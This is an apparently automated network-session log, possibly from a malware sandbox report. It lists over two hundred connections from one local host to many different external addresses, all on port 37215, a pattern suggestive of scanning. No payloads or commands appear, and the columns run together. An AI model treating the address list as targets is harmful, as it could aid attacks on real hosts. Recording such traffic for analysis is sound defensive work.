                                                  5107192.168.2.1337880197.202.65.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5108192.168.2.1360018102.38.82.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5109192.168.2.1349388197.172.228.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5110192.168.2.134967683.53.13.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5111192.168.2.1345216197.129.89.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5112192.168.2.1345570121.220.48.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5113192.168.2.1351186197.252.62.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5114192.168.2.134304279.139.219.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5115192.168.2.134998641.176.28.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5116192.168.2.1360004111.225.197.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5117192.168.2.1338540197.49.33.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5118192.168.2.134724441.185.152.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5119192.168.2.133867441.27.115.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5120192.168.2.1353182179.26.231.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5121192.168.2.1350464157.223.85.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5122192.168.2.1358802157.130.184.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5123192.168.2.1335434157.102.96.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5124192.168.2.1346866197.188.0.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5125192.168.2.1342324197.19.89.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5126192.168.2.133570295.230.108.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5127192.168.2.1351524157.78.218.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5128192.168.2.1360560197.183.36.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5129192.168.2.1332780197.190.50.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5130192.168.2.1347236168.146.43.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5131192.168.2.136093041.2.54.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5132192.168.2.134305841.243.74.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5133192.168.2.1355674157.63.85.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5134192.168.2.135152646.100.0.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5135192.168.2.1334950170.97.126.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5136192.168.2.135434041.29.71.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5137192.168.2.135536488.139.130.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5138192.168.2.133684465.20.252.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5139192.168.2.135413883.25.62.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5140192.168.2.135747897.174.5.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5141192.168.2.1355640135.53.99.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5142192.168.2.134099841.48.97.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5143192.168.2.133753634.136.2.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5144192.168.2.134471441.249.47.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5145192.168.2.1353010197.49.220.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5146192.168.2.1345698157.233.126.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5147192.168.2.135459241.80.158.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5148192.168.2.1351594157.19.176.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5149192.168.2.1358364191.119.185.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5150192.168.2.1334368156.131.139.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5151192.168.2.1335492123.221.150.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5152192.168.2.1336196157.68.21.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5153192.168.2.1359054197.148.130.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5154192.168.2.134072044.74.114.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5155192.168.2.1360172197.168.202.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5156192.168.2.134976841.172.195.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5157192.168.2.1359874197.14.212.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5158192.168.2.135052441.150.98.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5159192.168.2.1341434213.211.239.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5160192.168.2.133715437.194.220.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5161192.168.2.1348194197.67.21.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5162192.168.2.1338924197.117.76.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5163192.168.2.1348452157.170.250.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5164192.168.2.134034058.51.149.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5165192.168.2.1353054157.135.139.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5166192.168.2.1340120197.140.232.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5167192.168.2.1360104157.208.173.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5168192.168.2.134173041.107.222.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5169192.168.2.135940441.11.51.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5170192.168.2.1336880157.6.128.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5171192.168.2.1353808197.47.23.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5172192.168.2.135177641.158.213.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5173192.168.2.1351238197.214.165.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5174192.168.2.133858641.5.143.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5175192.168.2.1351278157.150.134.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5176192.168.2.1351088157.234.125.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5177192.168.2.135367647.43.170.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5178192.168.2.1343024166.51.243.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5179192.168.2.1351052157.68.238.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5180192.168.2.1340188157.6.136.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5181192.168.2.134874041.29.84.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5182192.168.2.1339502157.81.84.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5183192.168.2.1339846197.69.180.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5184192.168.2.1342278197.81.19.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5185192.168.2.1342220157.237.68.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5186192.168.2.134867041.224.98.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5187192.168.2.1354258197.122.174.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5188192.168.2.134033446.150.172.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5189192.168.2.1351428157.203.6.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5190192.168.2.1337230157.22.128.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5191192.168.2.1337256157.215.46.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5192192.168.2.1351210157.158.226.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5193192.168.2.1338958156.105.17.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5194192.168.2.1345504197.174.14.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5195192.168.2.1343488197.177.125.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5196192.168.2.1346890157.2.16.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5197192.168.2.1345908142.251.245.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5198192.168.2.133461241.26.51.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5199192.168.2.1355554157.184.182.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5200192.168.2.1356462157.64.231.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5201192.168.2.1340328197.48.124.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5202192.168.2.1344614157.228.120.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5203192.168.2.135693841.237.27.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5204192.168.2.1344300197.24.72.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5205192.168.2.13416742.64.31.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5206192.168.2.133976241.216.103.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5207192.168.2.134767299.203.8.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5208192.168.2.1353742157.132.66.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5209192.168.2.1349004197.18.51.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5210192.168.2.1343038157.42.37.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5211192.168.2.134832027.232.27.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5212192.168.2.133523641.102.198.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5213192.168.2.1352468157.57.252.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5214192.168.2.133591041.100.19.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5215192.168.2.133522241.29.109.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5216192.168.2.1343730157.179.225.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5217192.168.2.135507441.112.173.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5218192.168.2.133401654.78.68.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5219192.168.2.134110051.184.208.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5220192.168.2.1334896197.223.105.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5221192.168.2.1356602157.165.79.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5222192.168.2.133355241.29.209.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5223192.168.2.135435645.71.194.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5224192.168.2.133873441.129.80.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5225192.168.2.1348838157.122.40.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5226192.168.2.1337292197.204.145.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5227192.168.2.1347774197.122.178.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5228192.168.2.1333400157.3.85.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5229192.168.2.1348906197.69.42.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5230192.168.2.1351660117.136.11.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5231192.168.2.135883641.227.223.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5232192.168.2.134624241.239.14.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5233192.168.2.133891841.169.170.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5234192.168.2.1345206197.7.116.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5235192.168.2.1359264157.213.94.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5236192.168.2.1356874157.108.4.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5237192.168.2.1356856157.237.173.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5238192.168.2.133331841.58.118.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5239192.168.2.136015677.159.108.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5240192.168.2.1345008197.61.193.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5241192.168.2.13475948.75.224.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5242192.168.2.1357726191.7.204.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5243192.168.2.1337614197.18.85.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5244192.168.2.1354702105.63.50.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5245192.168.2.1356110120.135.129.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5246192.168.2.1334682197.156.151.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5247192.168.2.1350638197.121.33.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5248192.168.2.1339858157.13.129.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5249192.168.2.1337384197.234.74.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5250192.168.2.1332792197.204.181.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5251192.168.2.1351548197.11.12.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5252192.168.2.1351740197.1.175.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5253192.168.2.133398841.98.246.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5254192.168.2.134153880.253.189.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5255192.168.2.1353726156.244.106.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5256192.168.2.135913857.36.105.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5257192.168.2.1334122197.59.89.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5258192.168.2.1336024197.105.116.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5259192.168.2.1336454197.45.96.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5260192.168.2.135530041.124.99.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5261192.168.2.133772441.139.192.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5262192.168.2.1355408155.133.194.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5263192.168.2.1345236145.162.75.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5264192.168.2.134092225.188.111.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5265192.168.2.1332978157.245.136.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5266192.168.2.134147641.157.38.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5267192.168.2.1359764157.228.72.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5268192.168.2.1339504197.213.68.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5269192.168.2.1346772175.182.198.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5270192.168.2.1354802197.98.176.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5271192.168.2.133946441.163.125.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5272192.168.2.1344646157.57.178.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5273192.168.2.135194079.100.63.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5274192.168.2.1352438197.101.164.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5275192.168.2.1354224197.93.78.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5276192.168.2.1333310163.150.79.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5277192.168.2.1355390157.124.98.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5278192.168.2.135042676.218.119.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5279192.168.2.1360624157.19.37.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5280192.168.2.1354612157.55.188.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5281192.168.2.1334580157.39.249.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5282192.168.2.1336558197.35.195.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5283192.168.2.1339870197.169.77.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5284192.168.2.135067241.88.89.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5285192.168.2.1357072157.84.181.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5286192.168.2.1358080157.191.172.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5287192.168.2.1359746111.33.195.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5288192.168.2.1357376197.82.130.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5289192.168.2.1355392216.235.243.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5290192.168.2.1334254197.123.133.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5291192.168.2.1341290133.75.201.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5292192.168.2.134093041.23.248.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5293192.168.2.1348738108.253.157.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5294192.168.2.136028241.63.119.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5295192.168.2.135463841.172.136.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5296192.168.2.1351026157.118.95.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5297192.168.2.1344644157.3.91.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5298192.168.2.1346514157.176.18.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5299192.168.2.1360848197.77.252.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5300192.168.2.1348846174.226.104.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5301192.168.2.134575896.107.61.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5302192.168.2.1344618197.168.105.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5303192.168.2.1343938157.89.250.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5304192.168.2.133830641.140.28.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5305192.168.2.134994841.120.134.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5306192.168.2.1346214157.67.121.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5307192.168.2.134827441.211.36.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5308192.168.2.1354690197.60.212.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5309192.168.2.1333432204.87.232.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5310192.168.2.133286841.94.61.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5311192.168.2.1347434194.140.226.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5312192.168.2.1339412157.153.64.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5313192.168.2.1350918157.113.85.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5314192.168.2.133380241.91.254.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5315192.168.2.136032641.223.7.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5316192.168.2.1358200157.55.229.3837215
